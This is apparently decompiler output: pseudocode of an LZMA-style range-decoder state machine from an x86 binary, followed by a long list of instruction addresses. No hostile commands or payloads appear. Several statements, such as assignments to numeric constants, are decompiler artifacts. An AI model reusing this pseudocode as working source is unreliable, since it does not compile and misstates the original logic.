                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							__eax =  *(__ebp - 0x2c);
                                                                    							goto L101;
                                                                    						case 0xd:
                                                                    							L37:
                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                    								 *(__ebp - 0x88) = 0xd;
                                                                    								goto L170;
                                                                    							}
                                                                    							__ecx =  *(__ebp - 0x70);
                                                                    							__eax =  *(__ebp - 0xc);
                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							_t122 = __ebp - 0x70;
                                                                    							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                    							__eflags =  *_t122;
                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							L39:
                                                                    							__eax =  *(__ebp - 0x40);
                                                                    							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                    							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                    								goto L48;
                                                                    							}
                                                                    							__eflags = __ebx - 0x100;
                                                                    							if(__ebx >= 0x100) {
                                                                    								goto L54;
                                                                    							}
                                                                    							L41:
                                                                    							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                    							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                    							__ecx =  *(__ebp - 0x58);
                                                                    							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                    							 *(__ebp - 0x48) = __eax;
                                                                    							__eax = __eax + 1;
                                                                    							__eax = __eax << 8;
                                                                    							__eax = __eax + __ebx;
                                                                    							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    							__ax =  *__esi;
                                                                    							 *(__ebp - 0x54) = __esi;
                                                                    							__edx = __ax & 0x0000ffff;
                                                                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                    							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    							if( *(__ebp - 0xc) >= __ecx) {
                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    								__cx = __ax;
                                                                    								 *(__ebp - 0x40) = 1;
                                                                    								__cx = __ax >> 5;
                                                                    								__eflags = __eax;
                                                                    								__ebx = __ebx + __ebx + 1;
                                                                    								 *__esi = __ax;
                                                                    							} else {
                                                                    								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                    								 *(__ebp - 0x10) = __ecx;
                                                                    								0x800 = 0x800 - __edx;
                                                                    								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                    								__ebx = __ebx + __ebx;
                                                                    								 *__esi = __cx;
                                                                    							}
                                                                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    							 *(__ebp - 0x44) = __ebx;
                                                                    							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    								goto L39;
                                                                    							} else {
                                                                    								goto L37;
                                                                    							}
                                                                    						case 0xe:
                                                                    							L46:
                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                    								 *(__ebp - 0x88) = 0xe;
                                                                    								goto L170;
                                                                    							}
                                                                    							__ecx =  *(__ebp - 0x70);
                                                                    							__eax =  *(__ebp - 0xc);
                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							_t156 = __ebp - 0x70;
                                                                    							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                    							__eflags =  *_t156;
                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							while(1) {
                                                                    								L48:
                                                                    								__eflags = __ebx - 0x100;
                                                                    								if(__ebx >= 0x100) {
                                                                    									break;
                                                                    								}
                                                                    								__eax =  *(__ebp - 0x58);
                                                                    								__edx = __ebx + __ebx;
                                                                    								__ecx =  *(__ebp - 0x10);
                                                                    								__esi = __edx + __eax;
                                                                    								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                    								__ax =  *__esi;
                                                                    								 *(__ebp - 0x54) = __esi;
                                                                    								__edi = __ax & 0x0000ffff;
                                                                    								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    								if( *(__ebp - 0xc) >= __ecx) {
                                                                    									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    									__cx = __ax;
                                                                    									_t170 = __edx + 1; // 0x1
                                                                    									__ebx = _t170;
                                                                    									__cx = __ax >> 5;
                                                                    									__eflags = __eax;
                                                                    									 *__esi = __ax;
                                                                    								} else {
                                                                    									 *(__ebp - 0x10) = __ecx;
                                                                    									0x800 = 0x800 - __edi;
                                                                    									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    									__ebx = __ebx + __ebx;
                                                                    									 *__esi = __cx;
                                                                    								}
                                                                    								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    								 *(__ebp - 0x44) = __ebx;
                                                                    								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    									continue;
                                                                    								} else {
                                                                    									goto L46;
                                                                    								}
                                                                    							}
                                                                    							L54:
                                                                    							_t173 = __ebp - 0x34;
                                                                    							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                    							__eflags =  *_t173;
                                                                    							goto L55;
                                                                    						case 0xf:
                                                                    							L58:
                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                    								 *(__ebp - 0x88) = 0xf;
                                                                    								goto L170;
                                                                    							}
                                                                    							__ecx =  *(__ebp - 0x70);
                                                                    							__eax =  *(__ebp - 0xc);
                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							_t203 = __ebp - 0x70;
                                                                    							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                    							__eflags =  *_t203;
                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							L60:
                                                                    							__eflags = __ebx - 0x100;
                                                                    							if(__ebx >= 0x100) {
                                                                    								L55:
                                                                    								__al =  *(__ebp - 0x44);
                                                                    								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                    								goto L56;
                                                                    							}
                                                                    							L61:
                                                                    							__eax =  *(__ebp - 0x58);
                                                                    							__edx = __ebx + __ebx;
                                                                    							__ecx =  *(__ebp - 0x10);
                                                                    							__esi = __edx + __eax;
                                                                    							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                    							__ax =  *__esi;
                                                                    							 *(__ebp - 0x54) = __esi;
                                                                    							__edi = __ax & 0x0000ffff;
                                                                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    							if( *(__ebp - 0xc) >= __ecx) {
                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    								__cx = __ax;
                                                                    								_t217 = __edx + 1; // 0x1
                                                                    								__ebx = _t217;
                                                                    								__cx = __ax >> 5;
                                                                    								__eflags = __eax;
                                                                    								 *__esi = __ax;
                                                                    							} else {
                                                                    								 *(__ebp - 0x10) = __ecx;
                                                                    								0x800 = 0x800 - __edi;
                                                                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    								__ebx = __ebx + __ebx;
                                                                    								 *__esi = __cx;
                                                                    							}
                                                                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    							 *(__ebp - 0x44) = __ebx;
                                                                    							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    								goto L60;
                                                                    							} else {
                                                                    								goto L58;
                                                                    							}
                                                                    						case 0x10:
                                                                    							L109:
                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                    								 *(__ebp - 0x88) = 0x10;
                                                                    								goto L170;
                                                                    							}
                                                                    							__ecx =  *(__ebp - 0x70);
                                                                    							__eax =  *(__ebp - 0xc);
                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							_t365 = __ebp - 0x70;
                                                                    							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                    							__eflags =  *_t365;
                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							goto L111;
                                                                    						case 0x11:
                                                                    							goto L69;
                                                                    						case 0x12:
                                                                    							__eflags =  *(__ebp - 0x40);
                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                    								__eax =  *(__ebp - 0x58);
                                                                    								 *(__ebp - 0x84) = 0x13;
                                                                    								__esi =  *(__ebp - 0x58) + 2;
                                                                    								goto L132;
                                                                    							}
                                                                    							__eax =  *(__ebp - 0x4c);
                                                                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                    							__ecx =  *(__ebp - 0x58);
                                                                    							__eax =  *(__ebp - 0x4c) << 4;
                                                                    							__eflags = __eax;
                                                                    							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                    							goto L130;
                                                                    						case 0x13:
                                                                    							__eflags =  *(__ebp - 0x40);
                                                                    							if( *(__ebp - 0x40) != 0) {
                                                                    								_t469 = __ebp - 0x58;
                                                                    								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                    								__eflags =  *_t469;
                                                                    								 *(__ebp - 0x30) = 0x10;
                                                                    								 *(__ebp - 0x40) = 8;
                                                                    								L144:
                                                                    								 *(__ebp - 0x7c) = 0x14;
                                                                    								goto L145;
                                                                    							}
                                                                    							__eax =  *(__ebp - 0x4c);
                                                                    							__ecx =  *(__ebp - 0x58);
                                                                    							__eax =  *(__ebp - 0x4c) << 4;
                                                                    							 *(__ebp - 0x30) = 8;
                                                                    							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                    							L130:
                                                                    							 *(__ebp - 0x58) = __eax;
                                                                    							 *(__ebp - 0x40) = 3;
                                                                    							goto L144;
                                                                    						case 0x14:
                                                                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                    							__eax =  *(__ebp - 0x80);
                                                                    							goto L140;
                                                                    						case 0x15:
                                                                    							__eax = 0;
                                                                    							__eflags =  *(__ebp - 0x38) - 7;
                                                                    							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                    							__al = __al & 0x000000fd;
                                                                    							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                    							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                    							goto L120;
                                                                    						case 0x16:
                                                                    							__eax =  *(__ebp - 0x30);
                                                                    							__eflags = __eax - 4;
                                                                    							if(__eax >= 4) {
                                                                    								_push(3);
                                                                    								_pop(__eax);
                                                                    							}
                                                                    							__ecx =  *(__ebp - 4);
                                                                    							 *(__ebp - 0x40) = 6;
                                                                    							__eax = __eax << 7;
                                                                    							 *(__ebp - 0x7c) = 0x19;
                                                                    							 *(__ebp - 0x58) = __eax;
                                                                    							goto L145;
                                                                    						case 0x17:
                                                                    							L145:
                                                                    							__eax =  *(__ebp - 0x40);
                                                                    							 *(__ebp - 0x50) = 1;
                                                                    							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                    							goto L149;
                                                                    						case 0x18:
                                                                    							L146:
                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                    								 *(__ebp - 0x88) = 0x18;
                                                                    								goto L170;
                                                                    							}
                                                                    							__ecx =  *(__ebp - 0x70);
                                                                    							__eax =  *(__ebp - 0xc);
                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							_t484 = __ebp - 0x70;
                                                                    							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                    							__eflags =  *_t484;
                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							L148:
                                                                    							_t487 = __ebp - 0x48;
                                                                    							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                    							__eflags =  *_t487;
                                                                    							L149:
                                                                    							__eflags =  *(__ebp - 0x48);
                                                                    							if( *(__ebp - 0x48) <= 0) {
                                                                    								__ecx =  *(__ebp - 0x40);
                                                                    								__ebx =  *(__ebp - 0x50);
                                                                    								0 = 1;
                                                                    								__eax = 1 << __cl;
                                                                    								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                    								__eax =  *(__ebp - 0x7c);
                                                                    								 *(__ebp - 0x44) = __ebx;
                                                                    								goto L140;
                                                                    							}
                                                                    							__eax =  *(__ebp - 0x50);
                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                    							__eax =  *(__ebp - 0x58);
                                                                    							__esi = __edx + __eax;
                                                                    							 *(__ebp - 0x54) = __esi;
                                                                    							__ax =  *__esi;
                                                                    							__edi = __ax & 0x0000ffff;
                                                                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    							if( *(__ebp - 0xc) >= __ecx) {
                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    								__cx = __ax;
                                                                    								__cx = __ax >> 5;
                                                                    								__eax = __eax - __ecx;
                                                                    								__edx = __edx + 1;
                                                                    								__eflags = __edx;
                                                                    								 *__esi = __ax;
                                                                    								 *(__ebp - 0x50) = __edx;
                                                                    							} else {
                                                                    								 *(__ebp - 0x10) = __ecx;
                                                                    								0x800 = 0x800 - __edi;
                                                                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                    								 *__esi = __cx;
                                                                    							}
                                                                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    								goto L148;
                                                                    							} else {
                                                                    								goto L146;
                                                                    							}
                                                                    						case 0x19:
                                                                    							__eflags = __ebx - 4;
                                                                    							if(__ebx < 4) {
                                                                    								 *(__ebp - 0x2c) = __ebx;
                                                                    								L119:
                                                                    								_t393 = __ebp - 0x2c;
                                                                    								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                    								__eflags =  *_t393;
                                                                    								L120:
                                                                    								__eax =  *(__ebp - 0x2c);
                                                                    								__eflags = __eax;
                                                                    								if(__eax == 0) {
                                                                    									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                    									goto L170;
                                                                    								}
                                                                    								__eflags = __eax -  *(__ebp - 0x60);
                                                                    								if(__eax >  *(__ebp - 0x60)) {
                                                                    									goto L171;
                                                                    								}
                                                                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                    								__eax =  *(__ebp - 0x30);
                                                                    								_t400 = __ebp - 0x60;
                                                                    								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                    								__eflags =  *_t400;
                                                                    								goto L123;
                                                                    							}
                                                                    							__ecx = __ebx;
                                                                    							__eax = __ebx;
                                                                    							__ecx = __ebx >> 1;
                                                                    							__eax = __ebx & 0x00000001;
                                                                    							__ecx = (__ebx >> 1) - 1;
                                                                    							__al = __al | 0x00000002;
                                                                    							__eax = (__ebx & 0x00000001) << __cl;
                                                                    							__eflags = __ebx - 0xe;
                                                                    							 *(__ebp - 0x2c) = __eax;
                                                                    							if(__ebx >= 0xe) {
                                                                    								__ebx = 0;
                                                                    								 *(__ebp - 0x48) = __ecx;
                                                                    								L102:
                                                                    								__eflags =  *(__ebp - 0x48);
                                                                    								if( *(__ebp - 0x48) <= 0) {
                                                                    									__eax = __eax + __ebx;
                                                                    									 *(__ebp - 0x40) = 4;
                                                                    									 *(__ebp - 0x2c) = __eax;
                                                                    									__eax =  *(__ebp - 4);
                                                                    									__eax =  *(__ebp - 4) + 0x644;
                                                                    									__eflags = __eax;
                                                                    									L108:
                                                                    									__ebx = 0;
                                                                    									 *(__ebp - 0x58) = __eax;
                                                                    									 *(__ebp - 0x50) = 1;
                                                                    									 *(__ebp - 0x44) = 0;
                                                                    									 *(__ebp - 0x48) = 0;
                                                                    									L112:
                                                                    									__eax =  *(__ebp - 0x40);
                                                                    									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                    									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                    										_t391 = __ebp - 0x2c;
                                                                    										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                    										__eflags =  *_t391;
                                                                    										goto L119;
                                                                    									}
                                                                    									__eax =  *(__ebp - 0x50);
                                                                    									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                    									__eax =  *(__ebp - 0x58);
                                                                    									__esi = __edi + __eax;
                                                                    									 *(__ebp - 0x54) = __esi;
                                                                    									__ax =  *__esi;
                                                                    									__ecx = __ax & 0x0000ffff;
                                                                    									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                    									__eflags =  *(__ebp - 0xc) - __edx;
                                                                    									if( *(__ebp - 0xc) >= __edx) {
                                                                    										__ecx = 0;
                                                                    										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                    										__ecx = 1;
                                                                    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                    										__ebx = 1;
                                                                    										__ecx =  *(__ebp - 0x48);
                                                                    										__ebx = 1 << __cl;
                                                                    										__ecx = 1 << __cl;
                                                                    										__ebx =  *(__ebp - 0x44);
                                                                    										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                    										__cx = __ax;
                                                                    										__cx = __ax >> 5;
                                                                    										__eax = __eax - __ecx;
                                                                    										__edi = __edi + 1;
                                                                    										__eflags = __edi;
                                                                    										 *(__ebp - 0x44) = __ebx;
                                                                    										 *__esi = __ax;
                                                                    										 *(__ebp - 0x50) = __edi;
                                                                    									} else {
                                                                    										 *(__ebp - 0x10) = __edx;
                                                                    										0x800 = 0x800 - __ecx;
                                                                    										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                    										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                    										 *__esi = __dx;
                                                                    									}
                                                                    									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    										L111:
                                                                    										_t368 = __ebp - 0x48;
                                                                    										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                    										__eflags =  *_t368;
                                                                    										goto L112;
                                                                    									} else {
                                                                    										goto L109;
                                                                    									}
                                                                    								}
                                                                    								__ecx =  *(__ebp - 0xc);
                                                                    								__ebx = __ebx + __ebx;
                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                    								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                    								 *(__ebp - 0x44) = __ebx;
                                                                    								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                    									__ecx =  *(__ebp - 0x10);
                                                                    									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                    									__ebx = __ebx | 0x00000001;
                                                                    									__eflags = __ebx;
                                                                    									 *(__ebp - 0x44) = __ebx;
                                                                    								}
                                                                    								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    									L101:
                                                                    									_t338 = __ebp - 0x48;
                                                                    									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                    									__eflags =  *_t338;
                                                                    									goto L102;
                                                                    								} else {
                                                                    									goto L99;
                                                                    								}
                                                                    							}
                                                                    							__edx =  *(__ebp - 4);
                                                                    							__eax = __eax - __ebx;
                                                                    							 *(__ebp - 0x40) = __ecx;
                                                                    							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                    							goto L108;
                                                                    						case 0x1a:
                                                                    							L56:
                                                                    							__eflags =  *(__ebp - 0x64);
                                                                    							if( *(__ebp - 0x64) == 0) {
                                                                    								 *(__ebp - 0x88) = 0x1a;
                                                                    								goto L170;
                                                                    							}
                                                                    							__ecx =  *(__ebp - 0x68);
                                                                    							__al =  *(__ebp - 0x5c);
                                                                    							__edx =  *(__ebp - 8);
                                                                    							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                    							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                    							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                    							 *( *(__ebp - 0x68)) = __al;
                                                                    							__ecx =  *(__ebp - 0x14);
                                                                    							 *(__ecx +  *(__ebp - 8)) = __al;
                                                                    							__eax = __ecx + 1;
                                                                    							__edx = 0;
                                                                    							_t192 = __eax %  *(__ebp - 0x74);
                                                                    							__eax = __eax /  *(__ebp - 0x74);
                                                                    							__edx = _t192;
                                                                    							goto L79;
                                                                    						case 0x1b:
                                                                    							goto L75;
                                                                    						case 0x1c:
                                                                    							while(1) {
                                                                    								L123:
                                                                    								__eflags =  *(__ebp - 0x64);
                                                                    								if( *(__ebp - 0x64) == 0) {
                                                                    									break;
                                                                    								}
                                                                    								__eax =  *(__ebp - 0x14);
                                                                    								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                    								__eflags = __eax -  *(__ebp - 0x74);
                                                                    								if(__eax >=  *(__ebp - 0x74)) {
                                                                    									__eax = __eax +  *(__ebp - 0x74);
                                                                    									__eflags = __eax;
                                                                    								}
                                                                    								__edx =  *(__ebp - 8);
                                                                    								__cl =  *(__eax + __edx);
                                                                    								__eax =  *(__ebp - 0x14);
                                                                    								 *(__ebp - 0x5c) = __cl;
                                                                    								 *(__eax + __edx) = __cl;
                                                                    								__eax = __eax + 1;
                                                                    								__edx = 0;
                                                                    								_t414 = __eax %  *(__ebp - 0x74);
                                                                    								__eax = __eax /  *(__ebp - 0x74);
                                                                    								__edx = _t414;
                                                                    								__eax =  *(__ebp - 0x68);
                                                                    								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                    								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                    								__eflags =  *(__ebp - 0x30);
                                                                    								 *( *(__ebp - 0x68)) = __cl;
                                                                    								 *(__ebp - 0x14) = _t414;
                                                                    								if( *(__ebp - 0x30) > 0) {
                                                                    									continue;
                                                                    								} else {
                                                                    									goto L80;
                                                                    								}
                                                                    							}
                                                                    							 *(__ebp - 0x88) = 0x1c;
                                                                    							goto L170;
                                                                    					}
                                                                    				}
                                                                    			}













                                                                    0x00000000
                                                                    0x004070ab
                                                                    0x004070ab
                                                                    0x004070af
                                                                    0x00407166
                                                                    0x00407169
                                                                    0x00407175
                                                                    0x00407056
                                                                    0x00407056
                                                                    0x00407059
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x004073ce
                                                                    0x004073ce
                                                                    0x004073d4
                                                                    0x004073da
                                                                    0x004073e0
                                                                    0x004073fa
                                                                    0x004073fd
                                                                    0x00407403
                                                                    0x0040740e
                                                                    0x00407410
                                                                    0x004073e2
                                                                    0x004073e2
                                                                    0x004073f1
                                                                    0x004073f5
                                                                    0x004073f5
                                                                    0x0040741a
                                                                    0x00407441
                                                                    0x00407441
                                                                    0x00407447
                                                                    0x00407447
                                                                    0x00000000
                                                                    0x0040741c
                                                                    0x0040741c
                                                                    0x00407420
                                                                    0x004075cf
                                                                    0x00000000
                                                                    0x004075cf
                                                                    0x0040742c
                                                                    0x00407433
                                                                    0x0040743b
                                                                    0x0040743e
                                                                    0x00000000
                                                                    0x0040743e
                                                                    0x004070b5
                                                                    0x004070b9
                                                                    0x004075fa
                                                                    0x004075fa
                                                                    0x004075fd
                                                                    0x00407601
                                                                    0x00407601
                                                                    0x004070bf
                                                                    0x004070c5
                                                                    0x004070c8
                                                                    0x004070cc
                                                                    0x004070cf
                                                                    0x004070d3
                                                                    0x00407599
                                                                    0x004075e5
                                                                    0x004075ed
                                                                    0x004075f4
                                                                    0x004075f6
                                                                    0x00000000
                                                                    0x004075f6
                                                                    0x004070d9
                                                                    0x004070dc
                                                                    0x004070e2
                                                                    0x004070e4
                                                                    0x004070e4
                                                                    0x004070e7
                                                                    0x004070ea
                                                                    0x004070ed
                                                                    0x004070f0
                                                                    0x004070f3
                                                                    0x004070f6
                                                                    0x004070f7
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070f9
                                                                    0x004070fc
                                                                    0x004070ff
                                                                    0x00407102
                                                                    0x00407105
                                                                    0x00407105
                                                                    0x00407108
                                                                    0x0040710a
                                                                    0x0040710a
                                                                    0x0040710d
                                                                    0x0040710d
                                                                    0x0040710d
                                                                    0x00406be3
                                                                    0x00406be3
                                                                    0x00406bec
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406bf2
                                                                    0x00000000
                                                                    0x00406bfd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c06
                                                                    0x00406c09
                                                                    0x00406c0c
                                                                    0x00406c10
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c16
                                                                    0x00406c19
                                                                    0x00406c1b
                                                                    0x00406c1c
                                                                    0x00406c1f
                                                                    0x00406c21
                                                                    0x00406c22
                                                                    0x00406c24
                                                                    0x00406c27
                                                                    0x00406c2c
                                                                    0x00406c31
                                                                    0x00406c3a
                                                                    0x00406c4d
                                                                    0x00406c50
                                                                    0x00406c5c
                                                                    0x00406c84
                                                                    0x00406c86
                                                                    0x00406c94
                                                                    0x00406c94
                                                                    0x00406c98
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c88
                                                                    0x00406c88
                                                                    0x00406c8b
                                                                    0x00406c8c
                                                                    0x00406c8c
                                                                    0x00000000
                                                                    0x00406c88
                                                                    0x00406c62
                                                                    0x00406c67
                                                                    0x00406c67
                                                                    0x00406c70
                                                                    0x00406c78
                                                                    0x00406c7b
                                                                    0x00000000
                                                                    0x00406c81
                                                                    0x00406c81
                                                                    0x00000000
                                                                    0x00406c81
                                                                    0x00000000
                                                                    0x00406c9e
                                                                    0x00406c9e
                                                                    0x00406ca2
                                                                    0x0040754e
                                                                    0x00000000
                                                                    0x0040754e
                                                                    0x00406cab
                                                                    0x00406cbb
                                                                    0x00406cbe
                                                                    0x00406cc1
                                                                    0x00406cc1
                                                                    0x00406cc1
                                                                    0x00406cc4
                                                                    0x00406cc8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406cca
                                                                    0x00406cd0
                                                                    0x00406cfa
                                                                    0x00406d00
                                                                    0x00406d07
                                                                    0x00000000
                                                                    0x00406d07
                                                                    0x00406cd6
                                                                    0x00406cd9
                                                                    0x00406cde
                                                                    0x00406cde
                                                                    0x00406ce9
                                                                    0x00406cf1
                                                                    0x00406cf4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406d39
                                                                    0x00406d3f
                                                                    0x00406d42
                                                                    0x00406d4f
                                                                    0x00406d57
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406d0e
                                                                    0x00406d0e
                                                                    0x00406d12
                                                                    0x0040755d
                                                                    0x00000000
                                                                    0x0040755d
                                                                    0x00406d1e
